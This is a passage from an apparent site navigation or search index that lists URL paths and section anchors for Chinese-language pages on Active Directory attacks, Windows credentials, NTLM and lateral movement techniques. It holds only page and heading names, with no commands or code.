methodology/ad-certificates.html#安全通道-schannel-认证","windows-hardening/active-directory-methodology/ad-certificates.html#ad-证书服务枚举","windows-hardening/active-directory-methodology/ad-certificates.html#最近的漏洞与安全更新-2022-2025","windows-hardening/active-directory-methodology/ad-certificates.html#微软强化时间表-kb5014754","windows-hardening/active-directory-methodology/ad-certificates.html#检测与强化增强","windows-hardening/active-directory-methodology/ad-certificates.html#参考文献","windows-hardening/active-directory-methodology/ad-information-in-printers.html#打印机中的信息","windows-hardening/active-directory-methodology/ad-information-in-printers.html#打印机配置","windows-hardening/active-directory-methodology/ad-information-in-printers.html#捕获凭据","windows-hardening/active-directory-methodology/ad-information-in-printers.html#方法1--netcat监听器","windows-hardening/active-directory-methodology/ad-information-in-printers.html#方法-2--完整的恶意-ldap-服务器推荐","windows-hardening/active-directory-methodology/ad-information-in-printers.html#最近的回传漏洞2024-2025","windows-hardening/active-directory-methodology/ad-information-in-printers.html#施乐-versalink--cve-2024-12510--cve-2024-12511","windows-hardening/active-directory-methodology/ad-information-in-printers.html#佳能-imagerunner--imageclass--通告-2025年5月20日","windows-hardening/active-directory-methodology/ad-information-in-printers.html#自动化枚举--利用工具","windows-hardening/active-directory-methodology/ad-information-in-printers.html#加固与检测","windows-hardening/active-directory-methodology/ad-information-in-printers.html#参考文献","windows-hardening/active-directory-methodology/ad-dns-records.html#ad-dns-记录","windows-hardening/active-directory-methodology/ad-dns-records.html#创建修改记录-adidns-欺骗","windows-hardening/active-directory-methodology/ad-dns-records.html#powermad--invoke-dnsupdate-powershell","windows-hardening/active-directory-methodology/ad-dns-records.html#impacket--dnsupdatepy--python","windows-hardening/active-directory-methodology/ad-dns-records.html#bloodyad","windows-hardening/active-directory-methodology/ad-dns-records.html#常见攻击原语","windows-hardening/active-directory-methodology/ad-dns-records.html#检测与加固","windows-hardening/active-directory-methodology/ad-dns-records.html#参考文献","windows-hardening/active-directory-methodology/adws-enumeration.html#active-directory-web-services-adws-enumeration--stealth-collection","windows-hardening/active-directory-methodology/adws-enumeration.html#什么是-adws","windows-hardening/active-directory-methodology/adws-enumeration.html#soapy--原生-python-客户端","windows-hardening/active-directory-methodology/adws-enumeration.html#主要特性","windows-hardening/active-directory-methodology/adws-enumeration.html#安装操作员主机","windows-hardening/active-directory-methodology/adws-enumeration.html#stealth-ad-collection-workflow","windows-hardening/active-directory-methodology/adws-enumeration.html#编写-msds-allowedtoactonbehalfofotheridentity-rbcd","windows-hardening/active-directory-methodology/adws-enumeration.html#检测与加固","windows-hardening/active-directory-methodology/adws-enumeration.html#详细的-adds-日志记录","windows-hardening/active-directory-methodology/adws-enumeration.html#sacl-canary-objects","windows-hardening/active-directory-methodology/adws-enumeration.html#工具总结","windows-hardening/active-directory-methodology/adws-enumeration.html#参考文献","windows-hardening/active-directory-methodology/asreproast.html#asreproast","windows-hardening/active-directory-methodology/asreproast.html#asreproast-1","windows-hardening/active-directory-methodology/asreproast.html#破解","windows-hardening/active-directory-methodology/asreproast.html#持久性","windows-hardening/active-directory-methodology/asreproast.html#asreproast-无需凭证","windows-hardening/active-directory-methodology/asreproast.html#参考","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#badsuccessor-privilege-escalation-via-delegated-msa-migration-abuse","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#概述","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#攻击前提条件","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#枚举易受攻击的-ou","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#利用步骤","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#自动化","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#后期利用","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#检测与狩猎","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#缓解措施","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#另见","windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.html#参考文献","windows-hardening/active-directory-methodology/bloodhound.html#bloodhound--other-active-directory-enumeration-tools","windows-hardening/active-directory-methodology/bloodhound.html#ad-explorer","windows-hardening/active-directory-methodology/bloodhound.html#快速使用","windows-hardening/active-directory-methodology/bloodhound.html#adrecon","windows-hardening/active-directory-methodology/bloodhound.html#bloodhound-图形可视化","windows-hardening/active-directory-methodology/bloodhound.html#部署-docker-ce","windows-hardening/active-directory-methodology/bloodhound.html#收集器","windows-hardening/active-directory-methodology/bloodhound.html#group3r","windows-hardening/active-directory-methodology/bloodhound.html#pingcastle","windows-hardening/active-directory-methodology/constrained-delegation.html#constrained-delegation","windows-hardening/active-directory-methodology/constrained-delegation.html#constrained-delegation-1","windows-hardening/active-directory-methodology/custom-ssp.html#custom-ssp","windows-hardening/active-directory-methodology/custom-ssp.html#custom-ssp-1","windows-hardening/active-directory-methodology/dcshadow.html#dcshadow","windows-hardening/active-directory-methodology/dcshadow.html#使用-dcshadow-创建后门","windows-hardening/active-directory-methodology/dcshadow.html#shadowception---使用-dcshadow-授予-dcshadow-权限无修改权限日志","windows-hardening/active-directory-methodology/dcsync.html#dcsync","windows-hardening/active-directory-methodology/dcsync.html#dcsync-1","windows-hardening/active-directory-methodology/dcsync.html#enumeration","windows-hardening/active-directory-methodology/dcsync.html#本地利用","windows-hardening/active-directory-methodology/dcsync.html#远程利用","windows-hardening/active-directory-methodology/dcsync.html#持久性","windows-hardening/active-directory-methodology/dcsync.html#缓解措施","windows-hardening/active-directory-methodology/dcsync.html#参考","windows-hardening/active-directory-methodology/diamond-ticket.html#diamond-ticket","windows-hardening/active-directory-methodology/diamond-ticket.html#diamond-ticket-1","windows-hardening/active-directory-methodology/dsrm-credentials.html#dsrm-凭据","windows-hardening/active-directory-methodology/dsrm-credentials.html#缓解措施","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.html#外部森林域---单向入站或双向","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.html#枚举","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.html#初始访问","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.html#冒充","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.html#登录","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.html#sid-历史滥用","windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.html#完整的用户冒充方式","windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.html#外部森林域---单向出站","windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.html#枚举","windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.html#出站信任","windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.html#trust-account-attack","windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.html#收集明文信任密码","windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.html#参考","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#golden-gmsadmsa-攻击托管服务账户密码的离线推导","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#概述","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#golden-gmsa--golden-dmsa-攻击","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#先决条件","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#golden-gmsa--dmsa","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#检测与缓解","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#工具","windows-hardening/active-directory-methodology/golden-dmsa-gmsa.html#参考文献","windows-hardening/active-directory-methodology/golden-ticket.html#golden-ticket","windows-hardening/active-directory-methodology/golden-ticket.html#golden-ticket-1","windows-hardening/active-directory-methodology/golden-ticket.html#绕过常见检测","windows-hardening/active-directory-methodology/golden-ticket.html#缓解措施","windows-hardening/active-directory-methodology/golden-ticket.html#参考文献","windows-hardening/active-directory-methodology/kerberoast.html#kerberoast","windows-hardening/active-directory-methodology/kerberoast.html#kerberoast-1","windows-hardening/active-directory-methodology/kerberoast.html#关键点","windows-hardening/active-directory-methodology/kerberoast.html#攻击","windows-hardening/active-directory-methodology/kerberoast.html#opsec-和仅-aes-环境","windows-hardening/active-directory-methodology/kerberoast.html#破解","windows-hardening/active-directory-methodology/kerberoast.html#持久性--滥用","windows-hardening/active-directory-methodology/kerberoast.html#检测","windows-hardening/active-directory-methodology/kerberoast.html#缓解--加固","windows-hardening/active-directory-methodology/kerberoast.html#无域账户的-kerberoastas-请求的-st","windows-hardening/active-directory-methodology/kerberoast.html#参考","windows-hardening/active-directory-methodology/kerberos-authentication.html#kerberos-身份验证","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#kerberos-double-hop-problem","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#introduction","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#unconstrained-delegation","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#credssp","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#workarounds","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#invoke-command","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#注册-pssession-配置","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#portforwarding","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#openssh","windows-hardening/active-directory-methodology/kerberos-double-hop-problem.html#参考","windows-hardening/active-directory-methodology/lansweeper-security.html#lansweeper-滥用凭证收集秘密解密与部署-rce","windows-hardening/active-directory-methodology/lansweeper-security.html#1-通过-honeypot-收集扫描凭证ssh-示例","windows-hardening/active-directory-methodology/lansweeper-security.html#2-ad-acl-abuse-通过将自己添加到应用管理员组获得远程访问","windows-hardening/active-directory-methodology/lansweeper-security.html#3-在主机上解密-lansweeper-配置的机密","windows-hardening/active-directory-methodology/lansweeper-security.html#4-lansweeper-deployment--system-rce","windows-hardening/active-directory-methodology/lansweeper-security.html#检测与加固","windows-hardening/active-directory-methodology/lansweeper-security.html#相关主题","windows-hardening/active-directory-methodology/lansweeper-security.html#参考资料","windows-hardening/active-directory-methodology/laps.html#laps","windows-hardening/active-directory-methodology/laps.html#基本信息","windows-hardening/active-directory-methodology/laps.html#检查是否已激活","windows-hardening/active-directory-methodology/laps.html#laps-密码访问","windows-hardening/active-directory-methodology/laps.html#lapstoolkit","windows-hardening/active-directory-methodology/laps.html#dumping-laps-passwords-with-crackmapexec","windows-hardening/active-directory-methodology/laps.html#-使用-laps-密码-","windows-hardening/active-directory-methodology/laps.html#laps-持久性","windows-hardening/active-directory-methodology/laps.html#到期日期","windows-hardening/active-directory-methodology/laps.html#后门","windows-hardening/active-directory-methodology/laps.html#参考","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#mssql-ad-abuse","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#mssql-枚举--发现","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#python","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#在没有域会话的情况下从网络枚举","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#powershell","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#在没有域会话的情况下从网络枚举-1","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#从域内部枚举","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#mssql-基本滥用","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#访问数据库","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#mssql-rce","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#mssql-基本黑客技巧","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#mssql-受信任链接","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#powershell-滥用","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#metasploit","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#手动---openquery","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#手动---execute","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#本地权限提升","windows-hardening/active-directory-methodology/abusing-ad-mssql.html#sccm-管理点-ntlm-中继-osd-秘密提取","windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.html#over-pass-the-hashpass-the-key","windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.html#overpass-the-hashpass-the-key-ptk","windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.html#更隐蔽的版本","windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.html#参考","windows-hardening/active-directory-methodology/pass-the-ticket.html#pass-the-ticket","windows-hardening/active-directory-methodology/pass-the-ticket.html#pass-the-ticket-ptt","windows-hardening/active-directory-methodology/pass-the-ticket.html#在平台之间交换linux和windows票据","windows-hardening/active-directory-methodology/pass-the-ticket.html#pass-the-ticket攻击","windows-hardening/active-directory-methodology/pass-the-ticket.html#参考","windows-hardening/active-directory-methodology/password-spraying.html#password-spraying--brute-force","windows-hardening/active-directory-methodology/password-spraying.html#password-spraying","windows-hardening/active-directory-methodology/password-spraying.html#获取密码策略","windows-hardening/active-directory-methodology/password-spraying.html#从-linux或所有系统进行利用","windows-hardening/active-directory-methodology/password-spraying.html#识别并接管-password-must-change-at-next-logon-accounts-samr","windows-hardening/active-directory-methodology/password-spraying.html#暴力破解","windows-hardening/active-directory-methodology/password-spraying.html#kerberos-pre-auth-spraying-with-ldap-targeting-and-pso-aware-throttling-spearspray","windows-hardening/active-directory-methodology/password-spraying.html#outlook-web-access","windows-hardening/active-directory-methodology/password-spraying.html#google","windows-hardening/active-directory-methodology/password-spraying.html#okta","windows-hardening/active-directory-methodology/password-spraying.html#参考资料","windows-hardening/active-directory-methodology/printnightmare.html#printnightmare-windows-print-spooler-rcelpe","windows-hardening/active-directory-methodology/printnightmare.html#1-易受攻击的组件与-cve","windows-hardening/active-directory-methodology/printnightmare.html#2-利用技术","windows-hardening/active-directory-methodology/printnightmare.html#21-远程域控制器妥协-cve-2021-34527","windows-hardening/active-directory-methodology/printnightmare.html#22-本地权限提升任何支持的-windows2021-2024","windows-hardening/active-directory-methodology/printnightmare.html#23-spoolfool-cve-2022-21999--绕过-2021-修复","windows-hardening/active-directory-methodology/printnightmare.html#3-检测与狩猎","windows-hardening/active-directory-methodology/printnightmare.html#4-缓解与加固","windows-hardening/active-directory-methodology/printnightmare.html#5-相关研究--工具","windows-hardening/active-directory-methodology/printnightmare.html#参考文献","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#强制-ntlm-特权认证","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#sharpsystemtriggers","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#打印机后台处理程序服务滥用","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#在域中查找-windows-服务器","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#查找监听的spooler服务","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#请求服务对任意主机进行身份验证","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#结合不受限制的委托","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#rcp-强制身份验证","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#privexchange","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#在windows内部","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#defender-mpcmdrun","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#mssql","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#certutil","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#html-注入","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#通过电子邮件","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#mitm","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#其他强制和钓鱼-ntlm-认证的方法","windows-hardening/active-directory-methodology/printers-spooler-service-abuse.html#破解-ntlmv1","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#特权组","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#具有管理权限的知名组","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#账户操作员","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#adminsdholder-组","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#ad-回收站","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#域控制器访问","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#权限提升","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#backup-operators","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#本地攻击","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#ad-攻击","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#dnsadmins","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#执行任意-dll","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#wpad-记录用于-mitm","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#事件日志读取器","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#exchange-windows-permissions","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#hyper-v-管理员","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#利用示例","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#组织管理","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#权限利用和命令","windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html#references","windows-hardening/active-directory-methodology/rdp-sessions-abuse.html#rdp-sessions-abuse","windows-hardening/active-directory-methodology/rdp-sessions-abuse.html#rdp-process-injection","windows-hardening/active-directory-methodology/rdp-sessions-abuse.html#rdpinception","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#resource-based-constrained-delegation","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#basics-of-resource-based-constrained-delegation","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#new-concepts","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#attack-structure","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#攻击","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#创建计算机对象","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#配置基于资源的受限委派","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#执行完整的-s4u-攻击-windowsrubeus","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#linux-工具使用-impacket-进行端到端-rbcd2024","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#accessing","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#滥用不同的服务票证","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#枚举审计和清理","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#枚举配置了rbcd的计算机","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#清理--重置-rbcd","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#kerberos-错误","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#注释转发和替代方案","windows-hardening/active-directory-methodology/resource-based-constrained-delegation.html#参考文献","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#sccm-管理点-ntlm-中继到-sql--osd-策略秘密提取","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#tldr","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#1-枚举未经身份验证的-mp-端点","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#2-将-mp-机器账户中继到-mssql","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#3-通过存储过程识别-osd-策略","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#31-查找未知计算机-guid可选","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#32-列出分配的策略","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#33--检索完整主体","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#4-解码和解密-blob","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#5-相关的-sql-角色和过程","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#6-检测与加固","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#另请参见","windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.html#参考文献","windows-hardening/active-directory-methodology/security-descriptors.html#安全描述符","windows-hardening/active-directory-methodology/security-descriptors.html#安全描述符-1","windows-hardening/active-directory-methodology/security-descriptors.html#访问wmi","windows-hardening/active-directory-methodology/security-descriptors.html#访问-winrm","windows-hardening/active-directory-methodology/security-descriptors.html#远程访问哈希","windows-hardening/active-directory-methodology/sid-history-injection.html#sid-history-injection","windows-hardening/active-directory-methodology/sid-history-injection.html#sid-历史注入攻击","windows-hardening/active-directory-methodology/sid-history-injection.html#diamond-ticket-rubeus--krbtgt-aes256","windows-hardening/active-directory-methodology/sid-history-injection.html#golden-ticket-mimikatz-with-krbtgt-aes256","windows-hardening/active-directory-methodology/sid-history-injection.html#从-linux","windows-hardening/active-directory-methodology/sid-history-injection.html#参考","windows-hardening/active-directory-methodology/silver-ticket.html#silver-ticket","windows-hardening/active-directory-methodology/silver-ticket.html#silver-ticket-1","windows-hardening/active-directory-methodology/silver-ticket.html#在-linux-上","windows-hardening/active-directory-methodology/silver-ticket.html#在-windows-上","windows-hardening/active-directory-methodology/silver-ticket.html#示例mssql-服务-mssqlsvc--potato-提权到-system","windows-hardening/active-directory-methodology/silver-ticket.html#可用服务","windows-hardening/active-directory-methodology/silver-ticket.html#silver-tickets-事件-id","windows-hardening/active-directory-methodology/silver-ticket.html#持久化","windows-hardening/active-directory-methodology/silver-ticket.html#滥用-service-tickets","windows-hardening/active-directory-methodology/silver-ticket.html#cifs","windows-hardening/active-directory-methodology/silver-ticket.html#主机","windows-hardening/active-directory-methodology/silver-ticket.html#host--rpcss","windows-hardening/active-directory-methodology/silver-ticket.html#host--wsman-winrm","windows-hardening/active-directory-methodology/silver-ticket.html#ldap","windows-hardening/active-directory-methodology/silver-ticket.html#参考资料","windows-hardening/active-directory-methodology/skeleton-key.html#skeleton-key","windows-hardening/active-directory-methodology/skeleton-key.html#skeleton-key-attack","windows-hardening/active-directory-methodology/skeleton-key.html#mitigations","windows-hardening/active-directory-methodology/skeleton-key.html#references","windows-hardening/active-directory-methodology/TimeRoasting.html#timeroasting","windows-hardening/active-directory-methodology/TimeRoasting.html#how-to-attack","windows-hardening/active-directory-methodology/unconstrained-delegation.html#unconstrained-delegation","windows-hardening/active-directory-methodology/unconstrained-delegation.html#unconstrained-delegation-1","windows-hardening/active-directory-methodology/unconstrained-delegation.html#强制认证","windows-hardening/active-directory-methodology/unconstrained-delegation.html#缓解措施","windows-hardening/authentication-credentials-uac-and-efs/index.html#windows-安全控制","windows-hardening/authentication-credentials-uac-and-efs/index.html#applocker-策略","windows-hardening/authentication-credentials-uac-and-efs/index.html#检查","windows-hardening/authentication-credentials-uac-and-efs/index.html#绕过","windows-hardening/authentication-credentials-uac-and-efs/index.html#credentials-storage","windows-hardening/authentication-credentials-uac-and-efs/index.html#security-accounts-manager-sam","windows-hardening/authentication-credentials-uac-and-efs/index.html#local-security-authority-lsa---lsass","windows-hardening/authentication-credentials-uac-and-efs/index.html#lsa-secrets","windows-hardening/authentication-credentials-uac-and-efs/index.html#ntdsdit","windows-hardening/authentication-credentials-uac-and-efs/index.html#defender","windows-hardening/authentication-credentials-uac-and-efs/index.html#check","windows-hardening/authentication-credentials-uac-and-efs/index.html#加密文件系统-efs","windows-hardening/authentication-credentials-uac-and-efs/index.html#检查-efs-信息","windows-hardening/authentication-credentials-uac-and-efs/index.html#解密-efs-文件","windows-hardening/authentication-credentials-uac-and-efs/index.html#group-managed-service-accounts-gmsa","windows-hardening/authentication-credentials-uac-and-efs/index.html#滥用-acl-链式继承以读取-gmsa-管理密码-genericall---readgmsapassword","windows-hardening/authentication-credentials-uac-and-efs/index.html#laps","windows-hardening/authentication-credentials-uac-and-efs/index.html#ps-constrained-language-mode","windows-hardening/authentication-credentials-uac-and-efs/index.html#检查-1","windows-hardening/authentication-credentials-uac-and-efs/index.html#绕过-1","windows-hardening/authentication-credentials-uac-and-efs/index.html#ps-执行策略","windows-hardening/authentication-credentials-uac-and-efs/index.html#安全支持提供者接口-sspi","windows-hardening/authentication-credentials-uac-and-efs/index.html#主要-ssps","windows-hardening/authentication-credentials-uac-and-efs/index.html#uac---user-account-control","windows-hardening/authentication-credentials-uac-and-efs/index.html#references","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#uac---用户帐户控制","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#uac","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#uac-bypass-theory","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#check-uac","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#uac-bypass","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#uac-disabled","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#非常--基本的-uac-bypass完全-file-system-访问","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#使用-cobalt-strike-绕过-uac","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#krbuacbypass","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#uac-bypass-exploits","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#uac-bypass--fodhelperexe-registry-hijack","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#uac-bypass-with-gui","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#noisy-brute-force-uac-bypass","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#your-own-bypass---basic-uac-bypass-methodology","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#another-uac-bypass-technique","windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control.html#references","windows-hardening/ntlm/index.html#ntlm","windows-hardening/ntlm/index.html#基本信息","windows-hardening/ntlm/index.html#lmntlmv1-和-ntlmv2","windows-hardening/ntlm/index.html#gui","windows-hardening/ntlm/index.html#注册表","windows-hardening/ntlm/index.html#基本-ntlm-域认证方案","windows-hardening/ntlm/index.html#本地-ntlm-认证方案","windows-hardening/ntlm/index.html#ntlmv1-挑战","windows-hardening/ntlm/index.html#ntlmv1-攻击","windows-hardening/ntlm/index.html#使用-hashcat-的-ntlmv1-攻击","windows-hardening/ntlm/index.html#ntlmv2-挑战","windows-hardening/ntlm/index.html#pass-the-hash","windows-hardening/ntlm/index.html#mimikatz","windows-hardening/ntlm/index.html#从linux进行pass-the-hash","windows-hardening/ntlm/index.html#impacket-windows编译工具","windows-hardening/ntlm/index.html#invoke-thehash","windows-hardening/ntlm/index.html#evil-winrm-pass-the-hash","windows-hardening/ntlm/index.html#windows-credentials-editor-wce","windows-hardening/ntlm/index.html#手动windows远程执行使用用户名和密码","windows-hardening/ntlm/index.html#从windows主机提取凭据","windows-hardening/ntlm/index.html#内部独白攻击","windows-hardening/ntlm/index.html#ntlm中继和响应者","windows-hardening/ntlm/index.html#从网络捕获中解析ntlm挑战","windows-hardening/ntlm/index.html#ntlm和kerberos--反射--通过序列化spncve-2025-33073","windows-hardening/ntlm/index.html#漏洞的简要说明","windows-hardening/ntlm/index.html#快速poc","windows-hardening/ntlm/index.html#修补与缓解措施","windows-hardening/ntlm/index.html#检测思路","windows-hardening/ntlm/index.html#参考","windows-hardening/ntlm/places-to-steal-ntlm-creds.html#places-to-steal-ntlm-creds","windows-hardening/lateral-movement/index.html#lateral-movement","windows-hardening/lateral-movement/atexec.html#atexec--schtasksexec","windows-hardening/lateral-movement/atexec.html#它是如何工作的","windows-hardening/lateral-movement/dcomexec.html#dcom-exec","windows-hardening/lateral-movement/dcomexec.html#mmc20application","windows-hardening/lateral-movement/dcomexec.html#shellwindows--shellbrowserwindow","windows-hardening/lateral-movement/dcomexec.html#shellwindows","windows-hardening/lateral-movement/dcomexec.html#lateral-movement-with-excel-dcom-objects","windows-hardening/lateral-movement/dcomexec.html#automation-tools-for-lateral-movement","windows-hardening/lateral-movement/dcomexec.html#自动化工具","windows-hardening/lateral-movement/dcomexec.html#参考","windows-hardening/lateral-movement/psexec-and-winexec.html#psexecwinexecscexecsmbexec","windows-hardening/lateral-movement/psexec-and-winexec.html#它们是如何工作的","windows-hardening/lateral-movement/psexec-and-winexec.html#通过-scexe-手动-scexecwinexec","windows-hardening/lateral-movement/psexec-and-winexec.html#工具和示例","windows-hardening/lateral-movement/psexec-and-winexec.html#sysinternals-psexecexe","windows-hardening/lateral-movement/psexec-and-winexec.html#impacket-psexecpy-类似-psexec","windows-hardening/lateral-movement/psexec-and-winexec.html#impacket-smbexecpy-smbexec","windows-hardening/lateral-movement/psexec-and-winexec.html#sharplateral-和-sharpmove","windows-hardening/lateral-movement/psexec-and-winexec.html#opsec-detection-and-artifacts","windows-hardening/lateral-movement/psexec-and-winexec.html#troubleshooting-common-failures","windows-hardening/lateral-movement/psexec-and-winexec.html#hardening-notes","windows-hardening/lateral-movement/psexec-and-winexec.html#see-also","windows-hardening/lateral-movement/psexec-and-winexec.html#references","windows-hardening/lateral-movement/rdpexec.html#rdpexec","windows-hardening/lateral-movement/rdpexec.html#工作原理","windows-hardening/lateral-movement/scmexec.html#dcom-exec","windows-hardening/lateral-movement/scmexec.html#scm","windows-hardening/lateral-movement/scmexec.html#tools","windows-hardening/lateral-movement/winrm.html#winrm","windows-hardening/lateral-movement/wmiexec.html#wmiex